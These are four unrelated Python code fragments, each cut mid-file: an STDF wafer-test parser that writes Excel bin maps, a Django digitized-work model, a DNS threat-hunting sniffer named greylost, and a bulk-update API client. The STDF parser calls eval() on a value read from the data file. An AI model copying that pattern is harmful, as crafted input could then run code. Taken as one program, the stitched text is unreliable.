PIRhead = re.search('HEAD_NUM=(\d+)', line)
OneTDdict['head_num'][PIRindex] = int(PIRhead.group(1))
PIRsite = re.search('SITE_NUM=(\d+)', line)
OneTDdict['site_num'][PIRindex] = int(PIRsite.group(1))
PIRindex += 1
elif line.startswith('PTR:'):
PTRresult = re.search('RESULT=(.*) TEST_TXT', line)
PTRrslt = float( PTRresult.group(1) )
PIRcount = PIRindex
PTRtest_num = re.search('TEST_NUM=(\d+)', line)
testnumkey = 'test_num '+ PTRtest_num.group(1)
if (testnumkey in OneTDdict) == False:
OneTDdict[testnumkey] = []
for j in range(0, SDRsitecnt):
OneTDdict[testnumkey].append('na')
###
PTRopt_flag = re.search('OPT_FLAG=(\d+)', line)
if PTRopt_flag:
PTRoptflag = int( PTRopt_flag.group(1) )
if (testnumkey in PTRLoLimit) == False:
PTRLoLimit[testnumkey] = 'na'
if (((PTRoptflag >> 4) & 0x1) == 0) and (((PTRoptflag >> 6) & 0x1) == 0):
PTRlo_limit = re.search('LO_LIMIT=(.*) HI_LIMIT', line)
PTRLoLimit[testnumkey] = float( PTRlo_limit.group(1) )
if (testnumkey in PTRHiLimit) == False:
PTRHiLimit[testnumkey] = 'na'
if (((PTRoptflag >> 5) & 0x1) == 0) and (((PTRoptflag >> 7) & 0x1) == 0):
PTRhi_limit = re.search('HI_LIMIT=(.*) UNITS', line)
PTRHiLimit[testnumkey] = float( PTRhi_limit.group(1) )
###
PTRhead = re.search('HEAD_NUM=(\d+)', line)
PTRsite = re.search('SITE_NUM=(\d+)', line)
PTRtestflg = re.search('TEST_FLG=(\d+)', line)
for j in range(0, PIRcount):
if (int(PTRhead.group(1)) == OneTDdict['head_num'][j]) and (int(PTRsite.group(1)) == OneTDdict['site_num'][j]):
if int(PTRtestflg.group(1)) == 0 :
OneTDdict[testnumkey][j] = PTRrslt
elif line.startswith('MPR:'):
MPRrslt_cnt = re.search('RSLT_CNT=(\d+)', line)
MPRrsltcnt = int( MPRrslt_cnt.group(1) )
if MPRrsltcnt != 1:
print('MPR RSLT_CNT is not equal to 1, this script will not support!')
break
MPRrtn_rslt = re.search('RTN_RSLT=(.*) TEST_TXT', line)
MPRrtnrslt = eval( MPRrtn_rslt.group(1) )
PIRcount = PIRindex
MPRtest_num = re.search('TEST_NUM=(\d+)', line)
testnumkey = 'test_num '+ MPRtest_num.group(1)
if (testnumkey in OneTDdict) == False:
OneTDdict[testnumkey] = []
for j in range(0, SDRsitecnt):
OneTDdict[testnumkey].append('na')
###
MPRopt_flag = re.search('OPT_FLAG=(\d+)', line)
if MPRopt_flag:
MPRoptflag = int( MPRopt_flag.group(1) )
if (testnumkey in MPRLoLimit) == False:
MPRLoLimit[testnumkey] = 'na'
if (((MPRoptflag >> 4) & 0x1) == 0) and (((MPRoptflag >> 6) & 0x1) == 0):
MPRlo_limit = re.search('LO_LIMIT=(.*) HI_LIMIT', line)
MPRLoLimit[testnumkey] = float( MPRlo_limit.group(1) )
if (testnumkey in MPRHiLimit) == False:
MPRHiLimit[testnumkey] = 'na'
if (((MPRoptflag >> 5) & 0x1) == 0) and (((MPRoptflag >> 7) & 0x1) == 0):
MPRhi_limit = re.search('HI_LIMIT=(.*) START_IN', line)
MPRHiLimit[testnumkey] = float( MPRhi_limit.group(1) )
###
MPRhead = re.search('HEAD_NUM=(\d+)', line)
MPRsite = re.search('SITE_NUM=(\d+)', line)
MPRtestflg = re.search('TEST_FLG=(\d+)', line)
for j in range(0, PIRcount):
if (int(MPRhead.group(1)) == OneTDdict['head_num'][j]) and (int(MPRsite.group(1)) == OneTDdict['site_num'][j]):
if int(MPRtestflg.group(1)) == 0 :
OneTDdict[testnumkey][j] = float(MPRrtnrslt[0])
elif line.startswith('PRR:'):
PIRcount = PIRindex
PRRhead = re.search('HEAD_NUM=(\d+)', line)
PRRsite = re.search('SITE_NUM=(\d+)', line)
PRRhbin = re.search('HARD_BIN=(\d+)', line)
PRRsbin = re.search('SOFT_BIN=(\d+)', line)
PRRxcrd = re.search('X_COORD=([-+]?\d+)', line)
PRRycrd = re.search('Y_COORD=([-+]?\d+)', line)
for j in range(0, PIRcount):
if (int(PRRhead.group(1)) == OneTDdict['head_num'][j]) and (int(PRRsite.group(1)) == OneTDdict['site_num'][j]):
OneTDdict['hard_bin'][j] = int(PRRhbin.group(1))
OneTDdict['soft_bin'][j] = int(PRRsbin.group(1))
OneTDdict['x_coord'][j] = int(PRRxcrd.group(1))
OneTDdict['y_coord'][j] = int(PRRycrd.group(1))
PRRindex += 1
OneWaferdict['head_num'].append( int(PRRhead.group(1)) )
OneWaferdict['site_num'].append( int(PRRsite.group(1)) )
OneWaferdict['hard_bin'].append( int(PRRhbin.group(1)) )
OneWaferdict['soft_bin'].append( int(PRRsbin.group(1)) )
OneWaferdict['x_coord'].append( int(PRRxcrd.group(1)) )
OneWaferdict['y_coord'].append( int(PRRycrd.group(1)) )
if PIRcount == PRRindex:
OneTDheader = list(OneTDdict.keys())
if len(Headerinxlsx) < len(OneTDheader):
Headerinxlsx = OneTDheader
ws1.cell( row=1, column=1, value='Hi_Limit' ) ###
ws1.cell( row=2, column=1, value='Lo_Limit' ) ###
for y in range(0, len(OneTDheader)):
ws1.cell( row=xlsxheadrow, column=(y+1), value=OneTDheader[y] )
if OneTDheader[y] in PTRHiLimit:
ws1.cell( row=1, column=(y+1), value=PTRHiLimit[OneTDheader[y]] )
if OneTDheader[y] in PTRLoLimit:
ws1.cell( row=2, column=(y+1), value=PTRLoLimit[OneTDheader[y]] )
if OneTDheader[y] in MPRHiLimit:
ws1.cell( row=1, column=(y+1), value=MPRHiLimit[OneTDheader[y]] )
if OneTDheader[y] in MPRLoLimit:
ws1.cell( row=2, column=(y+1), value=MPRLoLimit[OneTDheader[y]] )
for y in range(0, len(OneTDheader)):
keyname = OneTDheader[y]
for x in range(0, PIRcount):
ws1.cell( row=(xlsxrow+x), column=(y+1), value=OneTDdict[keyname][x] )
xlsxrow = xlsxrow + PIRcount
for k in OneTDdict.keys():
for j in range(0, SDRsitecnt):
OneTDdict[k][j] = 'na'
PIRindex = 0
PRRindex = 0
###
###
if line.startswith('HBR:'):
HBRhead = re.search('HEAD_NUM=(\d+)', line)
if int(HBRhead.group(1)) == 255:
HBRhbin_num = re.search('HBIN_NUM=(\d+)', line)
HBRcont['hbin_num'].append( int(HBRhbin_num.group(1)) )
HBRhbin_pf = re.search('HBIN_PF=([PF]+)', line)
HBRcont['hbin_pf'].append( HBRhbin_pf.group(1) )
HBRhbin_nam = re.search('HBIN_NAM=(.*)', line)
if HBRhbin_nam:
HBRcont['hbin_nam'].append( HBRhbin_nam.group(1) )
else:
HBRcont['hbin_nam'].append('na')
###
###
if line.startswith('PCR:'):
PCRhead = re.search('HEAD_NUM=(\d+)', line)
if int(PCRhead.group(1)) == 255:
PCRpart_cnt = re.search('PART_CNT=(\d+)', line)
PCRcont['part_cnt'] = int(PCRpart_cnt.group(1))
PCRrtst_cnt = re.search('RTST_CNT=(\d+)', line)
PCRcont['rtst_cnt'] = int(PCRrtst_cnt.group(1))
###
###
print('PCR: HEAD_NUM=255', PCRcont)
print('HBR: HEAD_NUM=255', HBRcont)
print('OneWaferdict length', len(OneWaferdict['site_num']) )
print('OneWaferdict Xmax', max(OneWaferdict['x_coord']) , 'Xmin', min(OneWaferdict['x_coord']) )
print('OneWaferdict Ymax', max(OneWaferdict['y_coord']) , 'Ymin', min(OneWaferdict['y_coord']) )
OneWaferXmax = max(OneWaferdict['x_coord'])
OneWaferXmin = min(OneWaferdict['x_coord'])
OneWaferYmax = max(OneWaferdict['y_coord'])
OneWaferYmin = min(OneWaferdict['y_coord'])
###
Hbincolor = []
for k in range(0, 40, 1):
Hbincolor.append('na')
Hbincolor[0] = '00FFFFFF'
Hbincolor[1] = '0000FF00'
Hbincolor[2] = '0099CC00'
Hbincolor[3] = '00008000'
Hbincolor[4] = '00003300'
Hbincolor[6] = '00FF00FF'
Hbincolor[7] = '0000FFFF'
Hbincolor[10] = '000000FF'
Hbincolor[11] = '00FF0000'
Hbincolor[12] = '00FFFF00'
Hbincolor[13] = '00000080'
Hbincolor[15] = '00800000'
Hbincolor[17] = '00808000'
Hbincolor[18] = '00800080'
Hbincolor[19] = '00008080'
Hbincolor[20] = '009999FF'
Hbincolor[22] = '00993366'
Hbincolor[23] = '00FFFFCC'
Hbincolor[24] = '00CCFFFF'
Hbincolor[25] = '00660066'
Hbincolor[26] = '00FF8080'
Hbincolor[27] = '00C0C0C0'
Hbincolor[28] = '00808080'
Hbincolor[29] = '000066CC'
Hbincolor[30] = '00CCCCFF'
Hbincolor[31] = '00FFFF99'
Hbincolor[34] = '0099CCFF'
###
# only consider one head (HEAD_NUM=1) from STDF
MapPosX = 'L' # can be toward 'R' (right) or 'L' (left)
MapPosY = 'D' # can be toward 'U' (up) or 'D' (down)
colstart = 3
rowstart = 3
sd = Side(style='medium', color="000000")
blackbd= Border(left=sd, top=sd, right=sd, bottom=sd)
ws2 = wb.create_sheet(title="FirstscreenedMap")
if PCRcont['rtst_cnt'] > 0:
ws3 = wb.create_sheet(title="RetestedMap")
retest_count = 0
if MapPosX == 'L':
Xgapvalue = OneWaferXmax + colstart
colindex = colstart
for i in range(OneWaferXmax, (OneWaferXmin-1), -1):
ws2.column_dimensions[get_column_letter(colindex)].width = 5.0
ws2.cell( row=1, column=colindex, value=i ).border = blackbd
if PCRcont['rtst_cnt'] > 0:
ws3.column_dimensions[get_column_letter(colindex)].width = 5.0
ws3.cell( row=1, column=colindex, value=i ).border = blackbd
colindex += 1
if MapPosX == 'R':
Xgapvalue = OneWaferXmin - colstart # to be checked
colindex = colstart
for i in range(OneWaferXmin, (OneWaferXmax+1), 1):
ws2.column_dimensions[get_column_letter(colindex)].width = 5.0
ws2.cell( row=1, column=colindex, value=i ).border = blackbd
colindex += 1
if MapPosY == 'D':
Ygapvalue = OneWaferYmin - rowstart
rowindex = rowstart
for i in range(OneWaferYmin, (OneWaferYmax+1), 1):
ws2.column_dimensions['A'].width = 5.0
ws2.cell( row=rowindex, column=1, value=i ).border = blackbd
if PCRcont['rtst_cnt'] > 0:
ws3.column_dimensions['A'].width = 5.0
ws3.cell( row=rowindex, column=1, value=i ).border = blackbd
rowindex += 1
if MapPosY == 'U':
Ygapvalue = OneWaferYmax + rowstart # to be checked
rowindex = | |
or full; defaults to full
item_type = models.CharField(
max_length=1,
choices=ITEMTYPE_CHOICES,
default=FULL,
help_text="Portion of the work that is included; used to determine icon for public display.",
)
#: book or journal title for excerpt or article
book_journal = models.TextField(
"Book/Journal title",
help_text="title of the book or journal that includes this content (excerpt/article only)",
blank=True,
)
pages_orig = models.CharField(
"Page range (original)",
max_length=255,
help_text="Page range in the original work (for display and citation).",
blank=True,
)
pages_digital = models.CharField(
"Page range (digital edition)",
max_length=255,
help_text="Sequence of pages in the digital edition. "
+ "Use full digits for start and end separated by a dash (##-##); "
+ "for multiple sequences, separate ranges by a comma (##-##, ##-##). "
+ "NOTE: removing page range may have unexpected results.",
blank=True,
validators=[validate_page_range],
)
class Meta:
ordering = ("sort_title",)
# require unique combination of source id + page range,
# since we need to allow multiple excerpts from the same source
constraints = [
models.UniqueConstraint(
fields=["source_id", "pages_digital"], name="unique_sourceid_pagerange"
)
]
def get_absolute_url(self):
"""
Return object's url for
:class:`ppa.archive.views.DigitizedWorkDetailView`
"""
url_opts = {"source_id": self.source_id}
# start page must be specified if set but must not be included if empty
if self.pages_digital:
url_opts["start_page"] = self.first_page()
return reverse("archive:detail", kwargs=url_opts)
def __str__(self):
"""Default string display. Uses :attr:`source_id` and :attr:`pages_digital` if any"""
if self.pages_digital:
return "%s (%s)" % (self.source_id, self.pages_digital)
return self.source_id
def clean_fields(self, exclude=None):
if not exclude or "pages_digital" not in exclude:
# normalize whitespace in pages digital field before applying regex validation
self.pages_digital = " ".join(self.pages_digital.strip().split())
super().clean_fields(exclude=exclude)
@property
def is_suppressed(self):
"""Item has been suppressed (based on :attr:`status`)."""
return self.status == self.SUPPRESSED
def display_title(self):
"""admin display title to allow displaying title but sorting on sort_title"""
return self.title
display_title.short_description = "title"
display_title.admin_order_field = "sort_title"
def is_public(self):
"""admin display field indicating if record is public or suppressed"""
return self.status == self.PUBLIC
is_public.short_description = "Public"
is_public.boolean = True
is_public.admin_order_field = "status"
#: regular expresion for cleaning preliminary text from publisher names
printed_by_re = (
r"^(Printed)?( and )?(Pub(.|lished|lisht)?)?( and sold)? (by|for|at)( the)? ?"
)
# Printed by/for (the); Printed and sold by; Printed and published by;
# Pub./Published/Publisht at/by/for the
pubyear_re = re.compile(r"(?P<year>\d{4})")
@property
def has_fulltext(self):
"""Checks if an item has full text (currently only items from
HathiTrust or Gale)."""
return self.source in [self.HATHI, self.GALE]
@cached_property
def hathi(self):
""":class:`ppa.archive.hathi.HathiObject` for HathiTrust records,
for working with data in HathiTrust pairtree data structure."""
if self.source == self.HATHI:
return HathiObject(self.source_id)
return None
def save(self, *args, **kwargs):
# if status has changed so that object is now suppressed,
# do some cleanup
if self.has_changed("status") and self.status == self.SUPPRESSED:
# remove indexed page content from Solr
self.solr.update.delete_by_query('source_id:"%s"' % self.source_id)
# if this is a HathiTrust item, remove pairtree data
if self.source == DigitizedWork.HATHI:
self.hathi.delete_pairtree_data()
# Solr identifier is based on combination of source id and first page;
# if either changes, remove the old record from Solr before saving
# with the new identifier
if self.has_changed("source_id") or self.has_changed("pages_digital"):
# store the updated values
new_source_id = self.source_id
new_pages_digital = self.pages_digital
# temporarily revert to previous value to remove from index
self.source_id = self.initial_value("source_id")
self.pages_digital = self.initial_value("pages_digital")
self.remove_from_index()
# restore new values
self.source_id = new_source_id
self.pages_digital = new_pages_digital
if self.has_changed("pages_digital"):
# if there is a page range set now, update page count and index
if self.pages_digital:
# recalculate page total based on current range
self.page_count = self.count_pages()
# update index to remove all pages that are no longer in range
self.solr.update.delete_by_query(
'source_id:"%s" AND item_type:page NOT order:(%s)'
% (self.source_id, " OR ".join(str(p) for p in self.page_span))
)
# any page range change requires reindexing (potentially slow)
logger.debug("Reindexing pages for %s after change to page range", self)
self.index_items(Page.page_index_data(self))
# NOTE: removing a page range may not work as expected
# (does not recalculate page count; cannot recalculate for Gale items)
super().save(*args, **kwargs)
def clean(self):
"""Add custom validation to trigger a save error in the admin
if someone tries to unsuppress a record that has been suppressed
(not yet supported)."""
if self.has_changed("status") and self.status != self.SUPPRESSED:
raise ValidationError("Unsuppressing records not yet supported.")
# should not be editable in admin, but add a validation check
# just in case
if self.has_changed("source_id") and self.source == self.HATHI:
raise ValidationError(
"Changing source ID for HathiTrust records is not supported"
)
def compare_protected_fields(self, db_obj):
"""Compare protected fields in a
:class:`ppa.archive.models.DigitizedWork` instance and return those
that are changed.
:param object db_obj: Database instance of a
:class:`~ppa.archive.models.DigitizedWork`.
"""
changed_fields = []
# if a field has changed, append to changed fields
for field in ProtectedWorkFieldFlags.all_flags:
# field is in format of ProtectedWorkFieldFlags.title
field_name = str(field)
# if obj has a different value for a protected field
# than its db counterpart
if getattr(self, field_name) != getattr(db_obj, field_name):
# append as a now protected field
changed_fields.append(field_name)
return changed_fields
def populate_fields(self, field_data):
"""Conditionally update fields as protected by flags using Hathi
bibdata information.
:param dict field_data: A dictionary of fields updated from a
:class:`ppa.archive.hathi.HathiBibliographicRecord` instance.
"""
protected_fields = [str(field) for field in self.protected_fields]
for field, value in field_data.items():
if field not in protected_fields:
setattr(self, field, value)
def metadata_from_marc(self, marc_record, populate=True):
"""Get metadata from MARC record and return a dictionary
of the data. When populate is True, calls `populate_fields`
to set values."""
# create dictionary to store bibliographic information
field_data = {}
# set title and subtitle from marc if possible
# - clean title: strip trailing space & slash and initial bracket
field_data["title"] = marc_record["245"]["a"].rstrip(" /").lstrip("[")
# according to PUL CAMS,
# 245 subfield contains the subtitle *if* the preceding field
# ends with a colon. (Otherwise could be a parallel title,
# e.g. title in another language).
# HOWEVER: metadata from Hathi doesn't seem to follow this
# pattern (possibly due to records being older?)
# subfields is a list of code, value, code, value
# iterate in paired steps of two starting with first and second
# for code, value in zip(marc_record['245'].subfields[0::2],
# marc_record['245'].subfields[1::2]):
# if code == 'b':
# break
# preceding_character = value[-1:]
# if preceding_character == ':':
# self.subtitle = marc_record['245']['b'] or ''
# NOTE: skipping preceding character check for now
field_data["subtitle"] = marc_record["245"]["b"] or ""
# strip trailing space & slash from subtitle
field_data["subtitle"] = field_data["subtitle"].rstrip(" /")
# indicator 2 provides the number of characters to be
# skipped when sorting (could be 0)
try:
non_sort = int(marc_record["245"].indicators[1])
except ValueError:
# at least one record has a space here instead of a number
# probably a data error, but handle it
# - assuming no non-sort characters
non_sort = 0
# strip whitespace, since a small number of records have a
# nonsort value that doesn't include a space after a
# definite article.
# Also strip punctuation, since MARC only includes it in
# non-sort count when there is a definite article.
field_data["sort_title"] = marc_record.title()[non_sort:].strip(' "[')
field_data["author"] = marc_record.author() or ""
# remove a note present on some records and strip whitespace
field_data["author"] = (
field_data["author"].replace("[from old catalog]", "").strip()
)
# removing trailing period, except when it is part of an
# initial or known abbreviation (i.e, Esq.)
# Look for single initial, but support initials with no spaces
if field_data["author"].endswith(".") and not re.search(
r"( ([A-Z]\.)*[A-Z]| Esq)\.$", field_data["author"]
):
field_data["author"] = field_data["author"].rstrip(".")
# field 260 includes publication information
if "260" in marc_record:
# strip trailing punctuation from publisher and pub place
# subfield $a is place of publication
field_data["pub_place"] = marc_record["260"]["a"] or ""
field_data["pub_place"] = field_data["pub_place"].rstrip(";:,")
# if place is marked as unknown ("sine loco"), leave empty
if field_data["pub_place"].lower() == "[s.l.]":
field_data["pub_place"] = ""
# subfield $b is name of publisher
field_data["publisher"] = marc_record["260"]["b"] or ""
field_data["publisher"] = field_data["publisher"].rstrip(";:,")
# if publisher is marked as unknown ("sine nomine"), leave empty
if field_data["publisher"].lower() == "[s.n.]":
field_data["publisher"] = ""
# remove printed by statement before publisher name
field_data["publisher"] = re.sub(
self.printed_by_re, "", field_data["publisher"], flags=re.IGNORECASE
)
# Gale/ECCO dates may | |
#!/usr/bin/env python3
""" greylost - DNS threat hunting. """
import os
import sys
import json
import copy
import argparse
import signal
import pickle
import atexit
import syslog
import statistics
from base64 import b64encode
from time import sleep, time
from datetime import datetime
import dnslib
from dmfrbloom.timefilter import TimeFilter
from pysniffer import Sniffer
from record_types import DNS_RECORD_TYPES
class RollingLog():
def __init__(self, size):
self.size = size
self.log = [None for _ in range(size)]
def add(self, data):
self.log += [data]
if len(self.log) > self.size:
self.log = self.log[-1 * self.size:]
def clear(self):
self.log = []
def error_fatal(msg, exit_value=os.EX_USAGE):
""" error_fatal() - Log an error and exit.
Args:
msg (str) - Error message.
exit_value - Value to pass to exit()
Returns:
Nothing.
"""
error(msg)
exit(exit_value)
def error(msg):
""" error() - Log an error.
Args:
msg (str) - Error message.
Returns:
Nothing.
"""
if not Settings.get("daemonize"):
print("[-] %s" % msg, file=sys.stderr)
syslog.syslog(msg)
def log(msg):
""" log() - Log a message.
Args:
msg (str) - Message.
Returns:
Nothing
"""
if not Settings.get("daemonize"):
print("[+] %s" % msg)
syslog.syslog(msg)
def parse_dns_response(response_list):
""" parse_dns_response() - Parses DNS responses.
Args:
response_list (list) - Response list
Returns:
List of responses sorted by "rdata" key.
"""
response_sorted_list = []
for response in response_list:
# <EDNS Option: Code=4 Data='0006629ac1efefda609ac1efefda'>
if isinstance(response.rdata, dnslib.EDNSOption):
rdata = {"code": response.rdata.code, "data": response.rdata.data}
else:
rdata = str(response.rdata)
response_sorted_list.append({"rname": str(response.rname),
"rtype": DNS_RECORD_TYPES[response.rtype],
"rtype_id": response.rtype,
"rclass": response.rclass,
"rdata": rdata,
"ttl": response.ttl})
# Sort results to avoid logical duplicates in the bloom filter
return sorted(response_sorted_list, key=lambda k: k["rdata"])
def parse_dns_packet(packet):
""" parse_dns_packet() - Converts DNS packet to a dict.
Args:
packet (Packet object) - The packet to parse.
Returns:
dict representing the DNS packet.
"""
output = {}
output["timestamp"] = datetime.now().replace(microsecond=0).isoformat()
output["protocol"] = packet.protocol
output["saddr"] = packet.saddr
output["daddr"] = packet.daddr
output["sport"] = packet.sport
output["dport"] = packet.dport
try:
dns_packet = dnslib.DNSRecord.parse(packet.data)
except (dnslib.dns.DNSError, TypeError):
if packet.data:
# TODO don't encode if everything is printable
output["payload"] = b64encode(packet.data).decode("utf-8")
return output
output["id"] = dns_packet.header.id
output["q"] = dns_packet.header.q
output["a"] = dns_packet.header.a
if dns_packet.questions:
output["questions"] = []
for question in dns_packet.questions:
output["questions"].append({"qname": str(question.qname),
"qtype": DNS_RECORD_TYPES[question.qtype],
"qtype_id": question.qtype,
"qclass": question.qclass})
if dns_packet.rr:
output["rr"] = parse_dns_response(dns_packet.rr)
if dns_packet.auth:
output["auth"] = parse_dns_response(dns_packet.auth)
if dns_packet.ar:
output["ar"] = parse_dns_response(dns_packet.ar)
return output
def stdout_packet_json(packet_dict):
""" stdout_packet_json() - Prints DNS packet in JSON format to stdout.
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True
"""
print(json.dumps(packet_dict))
return True
def stdout_greylist_miss(packet_dict):
""" stdout_greylist_miss() - Prints greylist misses to stdout.
Args:
packet_dict (dict) - dict containing information about the packet.
Returns:
True
"""
print("Not in filter:", json.dumps(packet_dict, indent=4))
return True
def check_greylist_ignore_list(packet_dict):
""" check_greylist_ignore_list() - Check the greylist ignore list prior to
adding to the greylist; this benign and
trusted services such as Netflix that
have a ton of IP addresses and subdomains
from wasting space in the filter.
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if query should be ignored.
False if query should be added to the greylist.
"""
try:
for question in packet_dict["questions"]:
for ignore in Settings.get("greylist_ignore_domains"):
if question["qname"].endswith(ignore):
return True
# .example.com. matches foo.example.com. and example.com.
if ignore.startswith(".") and question["qname"].endswith(ignore[1:]):
return True
except KeyError:
pass
return False
# TODO should I check responses too? need to collect more data...
# for response in ["rr", "ar", "auth"]:
# try:
# for chk in packet_dict[response]:
# for ign in Settings.get("greylist_ignore_domains"):
# if chk["rdata"].endswith(ign) or chk["rname"].endswith(ign):
# return True
# # .example.com. matches foo.example.com. and example.com.
# if ign[0] == "." and chk["rname"].endswith(ign[1:]):
# return True
# if ign[0] == "." and chk["rdata"].endswith(ign[1:]):
# return True
# except KeyError:
# pass
# return False
def average_packet(packet):
current = Settings.get("average_current")
if packet:
try:
current[packet.saddr + " " + packet.daddr] += 1
except KeyError:
current[packet.saddr + " " + packet.daddr] = 1
Settings.set("average_current", current)
history = Settings.get("average_history")
if (time() - Settings.get("average_last")) > 10:
for key in current:
if key in history.keys():
history[key].add(current[key])
else:
history[key] = RollingLog(60 * 10) # 60 * 10
history[key].add(current[key])
# Reap expired host pairs
current_keys = set(current.keys())
new_history = history
for key in history.copy():
if key not in current_keys:
new_history[key].add(0)
if set(history[key].log) == {0}:
new_history.pop(key)
del history
# Detect spikes in volume of traffic. This currently does not work
# correctly. It detects spikes in traffic, but takes several minutes
# or hours to correct itself.
# TODO if current minute is N% higher than average?
# TODO calculate median absolute deviation?
for x in new_history:
z = [i for i in new_history[x].log if i != None]
if len(z[:-1]) > 1:
print(x)
mean = statistics.mean(z[:-1])
stddev = statistics.stdev(z[:-1])
print(" ",
"SPIKE" if stddev > mean else "",
max(z),
mean,
new_history[x].log[-1],
stddev)
#if stddev > mean:
# print("SPIKE", x)
Settings.set("average_history", new_history)
Settings.set("average_current", {})
Settings.set("average_last", time())
def timefilter_packet(packet_dict):
""" timefilter_packet() - Add a packet to the greylist. This sorts and omits
volatile data such as port numbers, timestamps,
and the order of responses to prevent duplicate
elements from being added to the filter.
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if element was successfully added to the filter.
False if element was not added to the filter.
"""
# Check if domain is in ignore list.
if check_greylist_ignore_list(packet_dict):
return False
timefilter = Settings.get("timefilter")
# Remove volatile fields before adding to bloom filter
element_dict = copy.copy(packet_dict)
element_dict.pop("timestamp")
element_dict.pop("sport")
element_dict.pop("dport")
try:
element_dict.pop("id")
except KeyError:
return False
element = json.dumps(element_dict)
# Are we still baselining DNS traffic?
elapsed = time() - Settings.get("starttime")
learning = not elapsed > Settings.get("filter_learning_time")
if timefilter.lookup(element) is False and not learning:
for method in Settings.get("greylist_miss_methods"):
# Log everything rather than stripped down element_dict
if method is _greylist_miss_log:
_greylist_miss_log(packet_dict)
continue
method(element_dict)
timefilter.add(element)
del element_dict
return True
def all_log(packet_dict):
"""all_log() - log a DNS packet
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if successful, False if unsuccessful
"""
log_fd = Settings.get("all_log_fd")
if log_fd:
log_fd.write(json.dumps(packet_dict) + "\n")
log_fd.flush()
return True
return False
def _greylist_miss_log(packet_dict):
"""_greylist_miss_log() - log a greylist miss
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if successful, False if unsuccessful
"""
log_fd = Settings.get("greylist_miss_log_fd")
if log_fd:
log_fd.write(json.dumps(packet_dict) + "\n")
log_fd.flush()
return True
return False
def not_dns_log(packet_dict):
"""not_dns_log() - log non-DNS protocol traffic
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if successful, False if unsuccessful
"""
log_fd = Settings.get("not_dns_log_fd")
if log_fd:
log_fd.write(json.dumps(packet_dict) + "\n")
log_fd.flush()
return True
return False
def parse_cli(): # pylint: disable=R0915,R0912
"""parse_cli() -- parse CLI arguments
Args:
None
Returns:
Nothing
"""
description = "greylost by @dmfroberson"
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"--alllog",
default=False,
help="/path/to/all-log -- log of all DNS queries")
parser.add_argument(
"--notdnslog",
default=False,
help="/path/to/not-dns-log -- log of non-DNS protocol traffic")
parser.add_argument(
"--greylistmisslog",
default=False,
help="/path/to/greylist-miss-log -- log of greylist misses")
parser.add_argument(
"-b",
"--bpf",
default="port 53 or port 5353",
help="BPF filter to apply to the sniffer")
parser.add_argument(
"-d",
"--daemonize",
default=False,
action="store_true",
help="Daemonize")
parser.add_argument(
"--learningtime",
default=0,
type=int,
help="Time to baseline queries before alerting on greylist misses")
parser.add_argument(
"--logging",
default=False,
action="store_true",
help="Toggle logging")
parser.add_argument(
"--ignore",
default=None,
help="File containing list of domains to ignore when greylisting")
parser.add_argument(
"-i",
"--interface",
default="eth0",
help="Interface to sniff")
parser.add_argument(
"-o",
"--stdout",
action="store_true",
default=False,
help="Toggle stdout output")
parser.add_argument(
"-p",
"--precision",
default=0.001,
type=int,
help="Precision of bloom filter. Ex: 0.001")
parser.add_argument(
"-r",
"--pidfile",
default=None,
help="Path to PID file")
parser.add_argument(
"--filterfile",
default=None,
help="Path to timefilter's state file.")
parser.add_argument(
"-s",
"--filtersize",
default=10000000,
type=int,
help="Size of bloom filter")
parser.add_argument(
"--statistics",
action="store_true",
help="Toggle statistics collection")
parser.add_argument(
"--syslog",
action="store_true",
help="Toggle syslog logging")
parser.add_argument(
"-t",
"--filtertime",
default=60*60*24,
type=int,
help="Filter time")
parser.add_argument(
"--toggle-all-log",
action="store_true",
help="Toggle all log")
parser.add_argument(
"--toggle-not-dns-log",
action="store_true",
help="Toggle not DNS log")
parser.add_argument(
"--toggle-greylist-miss-log",
action="store_true",
help="Toggle greylist miss log")
parser.add_argument(
"-v",
"--verbose",
default=False,
action="store_true",
help="Increase verbosity")
parser.add_argument(
"-w",
"--dumpfile",
default=None,
help="Write captured packets to a dumpfile")
args = parser.parse_args()
Settings.set("bpf", args.bpf)
Settings.set("interface", args.interface)
Settings.set("filter_size", args.filtersize)
Settings.set("filter_precision", args.precision)
Settings.set("filter_time", args.filtertime)
Settings.set("filter_learning_time", args.learningtime)
Settings.set("verbose", args.verbose)
Settings.set("daemonize", args.daemonize)
Settings.set("pcap_dumpfile", args.dumpfile)
if args.syslog:
Settings.toggle("syslog")
if args.toggle_all_log:
Settings.toggle("logging_all")
if args.toggle_not_dns_log:
Settings.toggle("logging_not_dns")
if args.toggle_greylist_miss_log:
Settings.toggle("logging_greylist_miss")
if args.statistics:
Settings.toggle("statistics")
if args.filterfile:
try:
with open(args.filterfile, "ab"):
pass
except PermissionError as exc:
error_fatal("Unable to open filter %s: %s" % (args.filterfile, exc),
exit_value=os.EX_OSFILE)
Settings.set("filter_file", args.filterfile)
if args.stdout:
packet_methods = Settings.get("packet_methods")
if stdout_packet_json not in packet_methods:
packet_methods.append(stdout_packet_json)
Settings.set("packet_methods", packet_methods)
| |
'items': items_chunk,
'items_m2m': items_m2m_chunk,
}
if wait_for_completion is not None:
data['wait_for_completion'] = wait_for_completion
self.api.put(path=path, data=data, timeout=60)
@require_login
def partial_update_item(self, item, create_if_missing=None):
"""
Partially update some properties of an item.
:param dict item: item ID and properties {'item_id': ID, *<property_name: property_value>}
:param bool? create_if_missing: control whether an error should be returned or a new item
should be created when the ``item_id`` does not already exist. (default: false)
"""
item = dict(item)
item_id = self._itemid2url(item.pop('item_id'))
path = f'items/{item_id}/'
data = {
'item': item,
}
if create_if_missing is not None:
data['create_if_missing'] = create_if_missing
return self.api.patch(path=path, data=data)
@require_login
def partial_update_items_bulk(self, items, items_m2m=None, create_if_missing=None,
chunk_size=(1 << 10)):
"""
Partially update some properties of many items.
:param array items: array with fields ['id': ID, *<property_name: value_type>]
contains only the non-repeated values,
:param array? items_m2m: dict of arrays for repeated values:
{
*<repeated_property_name: {
'name': str,
'array': array with fields ['item_index': uint32, 'value_id': value_type],
}>
}
:param bool? create_if_missing: control whether an error should be returned or a new item
should be created when the ``item_id`` does not already exist. (default: false)
:param int? chunk_size: split the requests in chunks of this size (default: 1K)
"""
path = f'items-bulk/'
data = {}
